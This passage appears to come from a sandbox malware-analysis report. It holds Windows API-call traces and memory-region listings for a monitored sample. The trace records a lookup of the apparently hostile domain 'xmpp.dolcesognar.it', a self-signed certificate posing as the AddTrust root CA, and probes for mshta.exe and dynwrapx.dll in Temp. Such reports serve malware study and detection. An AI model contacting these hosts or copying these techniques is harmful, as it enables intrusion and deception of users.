	[0101.757] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426400000) returned 1
	[0101.757] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.760] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426700000) returned 1
	[0101.760] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0113.475] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819598100000) returned 1
	[0113.475] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0113.475] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819598200000) returned 1
	[0113.476] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0113.476] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819598300000) returned 1
	[0113.476] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.506] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819701300000) returned 1
	[0114.506] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.506] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819701300000) returned 1
	[0114.506] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.543] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819705000000) returned 1
	[0114.545] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.566] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819707300000) returned 1
	[0114.566] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.591] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819709800000) returned 1
	[0114.591] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.597] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819710400000) returned 1
	[0114.598] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.598] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819710500000) returned 1
	[0114.598] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.608] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819711500000) returned 1
	[0114.609] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.613] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819712000000) returned 1
	[0114.613] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.624] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819713000000) returned 1
	[0114.624] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.625] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819713200000) returned 1
	[0114.625] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.626] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819713300000) returned 1
	[0114.626] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.630] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819713700000) returned 1
	[0114.631] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0114.632] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1819713800000) returned 1
	[0114.632] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) 

Thread:
	id = 125
	os_tid = 0xaf4

	[0098.685] GetCurrentThreadId () returned 0xaf4
	[0098.685] GetLastError () returned 0x0
	[0098.685] SetLastError (dwErrCode=0x0) 
	[0098.685] WaitForSingleObject (hHandle=0x6fc, dwMilliseconds=0xffffffff) returned 0x0
	[0122.513] ReleaseSemaphore (in: hSemaphore=0x700, lReleaseCount=1, lpPreviousCount=0x489ff28 | out: lpPreviousCount=0x489ff28) returned 1
	[0122.513] WaitForSingleObject (hHandle=0x6fc, dwMilliseconds=0xffffffff) 

Thread:
	id = 126
	os_tid = 0x8ac

	[0098.700] GetCurrentThreadId () returned 0x8ac
	[0098.700] GetLastError () returned 0x0
	[0098.700] SetLastError (dwErrCode=0x0) 
	[0098.700] WaitForSingleObject (hHandle=0x70c, dwMilliseconds=0xffffffff) returned 0x0
	[0122.513] ReleaseSemaphore (in: hSemaphore=0x710, lReleaseCount=1, lpPreviousCount=0x49dff28 | out: lpPreviousCount=0x49dff28) returned 1
	[0122.513] WaitForSingleObject (hHandle=0x70c, dwMilliseconds=0xffffffff) 

Thread:
	id = 127
	os_tid = 0xb5c

	[0098.700] GetCurrentThreadId () returned 0xb5c
	[0098.700] GetLastError () returned 0x0
	[0098.700] SetLastError (dwErrCode=0x0) 
	[0098.700] WaitForSingleObject (hHandle=0x71c, dwMilliseconds=0xffffffff) returned 0x0
	[0122.514] ReleaseSemaphore (in: hSemaphore=0x720, lReleaseCount=1, lpPreviousCount=0x4b1ff28 | out: lpPreviousCount=0x4b1ff28) returned 1
	[0122.514] WaitForSingleObject (hHandle=0x71c, dwMilliseconds=0xffffffff) 

Thread:
	id = 132
	os_tid = 0x638

	[0102.090] GetCurrentThreadId () returned 0x638
	[0102.090] GetLastError () returned 0x0
	[0102.090] SetLastError (dwErrCode=0x0) 
	[0102.090] GetLastError () returned 0x0
	[0102.090] SetLastError (dwErrCode=0x0) 
	[0102.090] GetLastError () returned 0x0
	[0102.090] SetLastError (dwErrCode=0x0) 
	[0102.090] ReleaseSemaphore (in: hSemaphore=0x7e4, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1
	[0102.090] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0102.115] CryptAcquireContextW (in: phProv=0x6b7fddc, szContainer="1.2.840.113549.1.1.12", szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x6b7fddc*=0x0) returned 0
	[0102.126] GetLastError () returned 0x80090016
	[0102.126] CryptAcquireContextW (in: phProv=0x6b7fddc, szContainer="1.2.840.113549.1.1.12", szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x6b7fddc*=0x2603108) returned 1
	[0102.146] CryptGetUserKey (in: hProv=0x2603108, dwKeySpec=0x2, phUserKey=0x6b7fde0 | out: phUserKey=0x6b7fde0*=0x0) returned 0
	[0102.146] GetLastError () returned 0x8009000d
	[0102.146] CryptGenKey (in: hProv=0x2603108, Algid=0x2, dwFlags=0x4000001, phKey=0x6b7fde0 | out: phKey=0x6b7fde0*=0x26e4eb0) returned 1
	[0102.241] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x26d5040
	[0102.241] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0102.243] CryptSetProvParam (hProv=0x2603108, dwParam=0x8, pbData=0x2608a30, dwFlags=0x4) returned 1
	[0102.247] CryptDestroyKey (hKey=0x26e4eb0) returned 1
	[0102.247] CryptReleaseContext (hProv=0x2603108, dwFlags=0x0) returned 1
	[0102.247] CertStrToNameW (in: dwCertEncodingType=0x1, pszX500="CN=AddTrust External CA Root, OU=\"AddTrust External TTP Network\", O=AddTrust AB, C=SE", dwStrType=0x3, pvReserved=0x0, pbEncoded=0x0, pcbEncoded=0x6b7fee8, ppszError=0x0 | out: pbEncoded=0x0, pcbEncoded=0x6b7fee8, ppszError=0x0) returned 1
	[0102.249] CertStrToNameW (in: dwCertEncodingType=0x1, pszX500="CN=AddTrust External CA Root, OU=\"AddTrust External TTP Network\", O=AddTrust AB, C=SE", dwStrType=0x3, pvReserved=0x0, pbEncoded=0x27065d8, pcbEncoded=0x6b7fee8, ppszError=0x0 | out: pbEncoded=0x27065d8, pcbEncoded=0x6b7fee8, ppszError=0x0) returned 1
	[0102.249] CryptEncodeObject (in: dwCertEncodingType=0x10001, lpszStructType="2.5.29.15", pvStructInfo=0x6b7fddc, pbEncoded=0x0, pcbEncoded=0x6b7fdd8 | out: pbEncoded=0x0, pcbEncoded=0x6b7fdd8) returned 1
	[0102.250] CryptEncodeObject (in: dwCertEncodingType=0x10001, lpszStructType="2.5.29.15", pvStructInfo=0x6b7fddc, pbEncoded=0x517ce8, pcbEncoded=0x6b7fdd8 | out: pbEncoded=0x517ce8, pcbEncoded=0x6b7fdd8) returned 1
	[0102.250] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType="2.5.29.37", pvStructInfo=0x6b7fda0, pbEncoded=0x0, pcbEncoded=0x6b7fd9c | out: pbEncoded=0x0, pcbEncoded=0x6b7fd9c) returned 1
	[0102.250] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType="2.5.29.37", pvStructInfo=0x6b7fda0, pbEncoded=0x26b6ff0, pcbEncoded=0x6b7fd9c | out: pbEncoded=0x26b6ff0, pcbEncoded=0x6b7fd9c) returned 1
	[0102.250] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType="2.5.29.19", pvStructInfo=0x6b7fddc, pbEncoded=0x0, pcbEncoded=0x6b7fdd8 | out: pbEncoded=0x0, pcbEncoded=0x6b7fdd8) returned 1
	[0102.251] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType="2.5.29.19", pvStructInfo=0x6b7fddc, pbEncoded=0x517d28, pcbEncoded=0x6b7fdd8 | out: pbEncoded=0x517d28, pcbEncoded=0x6b7fdd8) returned 1
	[0102.251] CryptEncodeObject (in: dwCertEncodingType=0x10001, lpszStructType=0x6, pvStructInfo=0x6b7fda8, pbEncoded=0x0, pcbEncoded=0x6b7fd9c | out: pbEncoded=0x0, pcbEncoded=0x6b7fd9c) returned 1
	[0102.251] CryptEncodeObject (in: dwCertEncodingType=0x10001, lpszStructType=0x6, pvStructInfo=0x6b7fda8, pbEncoded=0x26ecb28, pcbEncoded=0x6b7fd9c | out: pbEncoded=0x26ecb28, pcbEncoded=0x6b7fd9c) returned 1
	[0102.251] CryptEncodeObject (in: dwCertEncodingType=0x10001, lpszStructType=0x10, pvStructInfo=0x6b7fda0, pbEncoded=0x0, pcbEncoded=0x6b7fd9c | out: pbEncoded=0x0, pcbEncoded=0x6b7fd9c) returned 1
	[0102.251] CryptEncodeObject (in: dwCertEncodingType=0x10001, lpszStructType=0x10, pvStructInfo=0x6b7fda0, pbEncoded=0x26bf9c0, pcbEncoded=0x6b7fd9c | out: pbEncoded=0x26bf9c0, pcbEncoded=0x6b7fd9c) returned 1
	[0102.251] GetSystemTime (in: lpSystemTime=0x6b7fe94 | out: lpSystemTime=0x6b7fe94*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x2, wSecond=0x6, wMilliseconds=0x1eb)) 
	[0102.251] GetSystemTime (in: lpSystemTime=0x6b7fe78 | out: lpSystemTime=0x6b7fe78*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x2, wSecond=0x6, wMilliseconds=0x1eb)) 
	[0102.252] CertCreateSelfSignCertificate (hCryptProvOrNCryptKey=0x0, pSubjectIssuerBlob=0x6b7fed0, dwFlags=0x0, pKeyProvInfo=0x6b7fea8, pSignatureAlgorithm=0x6b7fe88, pStartTime=0x6b7fe94, pEndTime=0x6b7fe78, pExtensions=0x6b7fec8) returned 0x57b408
	[0103.061] CertOpenStore (lpszStoreProvider=0x9, dwEncodingType=0x0, hCryptProv=0x0, dwFlags=0x10000, pvPara=0x43b9ee0) returned 0x26086e8
	[0103.063] CertAddCertificateContextToStore (in: hCertStore=0x26086e8, pCertContext=0x57b408, dwAddDisposition=0x3, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0103.064] CryptAcquireCertificatePrivateKey (in: pCert=0x57b408, dwFlags=0x0, pvReserved=0x0, phCryptProvOrNCryptKey=0x6b7fee4, pdwKeySpec=0x6b7fea4, pfCallerFreeProvOrNCryptKey=0x6b7fec4 | out: phCryptProvOrNCryptKey=0x6b7fee4, pdwKeySpec=0x6b7fea4, pfCallerFreeProvOrNCryptKey=0x6b7fec4) returned 1
	[0103.066] CryptReleaseContext (hProv=0x26044b0, dwFlags=0x0) returned 1
	[0103.066] CertFreeCertificateContext (pCertContext=0x57b408) returned 1
	[0103.066] CertCloseStore (hCertStore=0x26086e8, dwFlags=0x0) returned 1
	[0103.066] PostQueuedCompletionStatus (CompletionPort=0x398, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x44a7b20) returned 1
	[0103.066] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0114.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\mshta.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\mshta.exe"), dwDesiredAccess=0x10180, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff
	[0114.539] GetLastError () returned 0x2
	[0114.539] PostQueuedCompletionStatus (CompletionPort=0x398, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x44a7b20) returned 1
	[0114.539] SleepConditionVariableCS (ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff) 

Thread:
	id = 133
	os_tid = 0xf74

	[0102.091] GetCurrentThreadId () returned 0xf74
	[0102.091] GetLastError () returned 0x0
	[0102.091] SetLastError (dwErrCode=0x0) 
	[0102.091] GetLastError () returned 0x0
	[0102.091] SetLastError (dwErrCode=0x0) 
	[0102.091] GetLastError () returned 0x0
	[0102.091] SetLastError (dwErrCode=0x0) 
	[0102.091] ReleaseSemaphore (in: hSemaphore=0x7e4, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1
	[0102.091] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0108.385] GetAddrInfoW (in: pNodeName="xmpp.dolcesognar.it", pServiceName=0x0, pHints=0x57b720*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x25ee374 | out: ppResult=0x25ee374*=0x26ed050*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x51a72c0*(sa_family=2, sin_port=0x0, sin_addr="109.230.199.30"), ai_next=0x0)) returned 0
	[0108.387] PostQueuedCompletionStatus (CompletionPort=0x398, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x44a7b20) returned 1
	[0108.387] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0114.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\dynwrapx.dll" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\dynwrapx.dll"), dwDesiredAccess=0x10180, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff
	[0114.540] GetLastError () returned 0x2
	[0114.540] SleepConditionVariableCS (ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff) 

Thread:
	id = 134
	os_tid = 0xe04

	[0102.091] GetCurrentThreadId () returned 0xe04
	[0102.091] GetLastError () returned 0x0
	[0102.091] SetLastError (dwErrCode=0x0) 
	[0102.091] GetLastError () returned 0x0
	[0102.091] SetLastError (dwErrCode=0x0) 
	[0102.091] GetLastError () returned 0x0
	[0102.091] SetLastError (dwErrCode=0x0) 
	[0102.091] ReleaseSemaphore (in: hSemaphore=0x7e4, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1
	[0102.092] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0112.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\fatal-log.txt" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\fatal-log.txt"), dwDesiredAccess=0x80, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff
	[0112.935] GetLastError () returned 0x2
	[0112.936] PostQueuedCompletionStatus (CompletionPort=0x398, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x44a7b20) returned 1
	[0112.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uncaught-log.txt" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uncaught-log.txt"), dwDesiredAccess=0x80, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff
	[0112.936] GetLastError () returned 0x2
	[0112.936] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0114.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\dynwrapx.sxs.manifest" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\dynwrapx.sxs.manifest"), dwDesiredAccess=0x10180, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff
	[0114.542] GetLastError () returned 0x2
	[0114.542] SleepConditionVariableCS (ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff) 

Thread:
	id = 135
	os_tid = 0x628

	[0102.092] GetCurrentThreadId () returned 0x628
	[0102.092] GetLastError () returned 0x0
	[0102.092] SetLastError (dwErrCode=0x0) 
	[0102.092] GetLastError () returned 0x0
	[0102.092] SetLastError (dwErrCode=0x0) 
	[0102.092] GetLastError () returned 0x0
	[0102.092] SetLastError (dwErrCode=0x0) 
	[0102.092] ReleaseSemaphore (in: hSemaphore=0x7e4, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1
	[0102.147] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0112.936] SleepConditionVariableCS (in: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff | out: ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc) returned 1
	[0114.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\mshta.exe.manifest" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\mshta.exe.manifest"), dwDesiredAccess=0x10180, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff
	[0114.546] GetLastError () returned 0x2
	[0114.546] SleepConditionVariableCS (ConditionVariable=0x44a7ba8, CriticalSection=0x44a7bdc, dwMilliseconds=0xffffffff) 

Process:
	id = "13"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x4f202000"
	os_pid = "0xd50"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "11"
	os_parent_pid = "0x30c"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4320
	        start_va = 0x9600000
	          end_va = 0x97fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000009600000"
	        filename = ""

Region:
	              id = 4321
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4322
	        start_va = 0x8a09440000
	          end_va = 0x8a0947ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008a09440000"
	        filename = ""

Region:
	              id = 4323
	        start_va = 0x8a09600000
	          end_va = 0x8a097fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008a09600000"
	        filename = ""

Region:
	              id = 4324
	        start_va = 0x25a7f070000
	          end_va = 0x25a7f08ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f070000"
	        filename = ""

Region:
	              id = 4325
	        start_va = 0x25a7f090000
	          end_va = 0x25a7f0a4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f090000"
	        filename = ""

Region:
	              id = 4326
	        start_va = 0x7df5ffa70000
	          end_va = 0x7ff5ffa6ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffa70000"
	        filename = ""

Region:
	              id = 4327
	        start_va = 0x7ff6b6de0000
	          end_va = 0x7ff6b6e02fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6b6de0000"
	        filename = ""

Region:
	              id = 4328
	        start_va = 0x7ff6b7050000
	          end_va = 0x7ff6b7060fff
	     entry_point = 0x7ff6b7050000
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 4329
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4330
	        start_va = 0x25a7f120000
	          end_va = 0x25a7f21ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f120000"
	        filename = ""

Region:
	              id = 4331
	        start_va = 0x7ffc12840000
	          end_va = 0x7ffc12a27fff
	     entry_point = 0x7ffc12840000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 4332
	        start_va = 0x7ffc145f0000
	          end_va = 0x7ffc1469cfff
	     entry_point = 0x7ffc145f0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 4333
	        start_va = 0x8a09480000
	          end_va = 0x8a094bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008a09480000"
	        filename = ""

Region:
	              id = 4334
	        start_va = 0x25a7f070000
	          end_va = 0x25a7f07ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f070000"
	        filename = ""

Region:
	              id = 4335
	        start_va = 0x25a7f220000
	          end_va = 0x25a7f2ddfff
	     entry_point = 0x25a7f220000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4336
	        start_va = 0x7ff6b6ce0000
	          end_va = 0x7ff6b6ddffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6b6ce0000"
	        filename = ""

Region:
	              id = 4337
	        start_va = 0x7ffc15590000
	          end_va = 0x7ffc1562cfff
	     entry_point = 0x7ffc15590000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4379
	        start_va = 0x25a7f080000
	          end_va = 0x25a7f08ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f080000"
	        filename = ""

Region:
	              id = 4380
	        start_va = 0x25a7f0b0000
	          end_va = 0x25a7f0b6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f0b0000"
	        filename = ""

Region:
	              id = 4381
	        start_va = 0x25a7f0c0000
	          end_va = 0x25a7f0c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f0c0000"
	        filename = ""

Region:
	              id = 4382
	        start_va = 0x25a7f0d0000
	          end_va = 0x25a7f0d6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f0d0000"
	        filename = ""

Region:
	              id = 4383
	        start_va = 0x7ffbfa060000
	          end_va = 0x7ffbfa0b8fff
	     entry_point = 0x7ffbfa060000
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 4384
	        start_va = 0x7ffc101d0000
	          end_va = 0x7ffc10355fff
	     entry_point = 0x7ffc101d0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 4385
	        start_va = 0x7ffc12670000
	          end_va = 0x7ffc126d9fff
	     entry_point = 0x7ffc12670000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4386
	        start_va = 0x7ffc141a0000
	          end_va = 0x7ffc14325fff
	     entry_point = 0x7ffc141a0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4387
	        start_va = 0x7ffc14700000
	          end_va = 0x7ffc1481bfff
	     entry_point = 0x7ffc14700000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4388
	        start_va = 0x7ffc14820000
	          end_va = 0x7ffc1485afff
	     entry_point = 0x7ffc14820000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 4389
	        start_va = 0x7ffc148c0000
	          end_va = 0x7ffc14b3cfff
	     entry_point = 0x7ffc148c0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4390
	        start_va = 0x7ffc14bb0000
	          end_va = 0x7ffc14cf2fff
	     entry_point = 0x7ffc14bb0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 4391
	        start_va = 0x7ffc14d10000
	          end_va = 0x7ffc14e65fff
	     entry_point = 0x7ffc14d10000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4392
	        start_va = 0x7ffc152a0000
	          end_va = 0x7ffc15360fff
	     entry_point = 0x7ffc152a0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
